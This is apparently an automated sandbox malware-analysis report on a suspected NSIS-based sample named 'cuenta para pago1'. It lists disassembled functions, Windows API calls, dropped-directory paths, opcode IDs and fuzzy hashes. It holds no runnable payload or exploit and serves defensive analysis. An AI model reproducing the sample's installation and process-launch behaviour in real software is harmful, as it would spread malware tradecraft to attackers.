                                                                                        • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3585118688-0
                                                                                      • Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                                      • Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                        • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\,?,00000000,000000F0), ref: 00401645
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\, xrefs: 00401638
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\
                                                                                      • API String ID: 1892508949-3308347815
                                                                                      • Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                                                      • Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040570D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406B17 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406D18 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406533 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406981 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                                                      • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                                                      • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406A9F Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                                                      • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                                      • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004069EB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                                      • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                                                      • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                                      • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                                                                      • Instruction ID: c18903b5dbc92386bcc0ded8fd0819d4ecd3504ae344b6f49c713324e9d388be
                                                                                      • Opcode Fuzzy Hash: 288cd279d996e6978258c5401d24f1205cf80aac37a60ccff2d4d3eec1795da4
                                                                                      • Instruction Fuzzy Hash: 8F219831904219EACF20AFA5CE48A9E7E71AF00354F60427BF511B51E1C7BD8E41DA5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
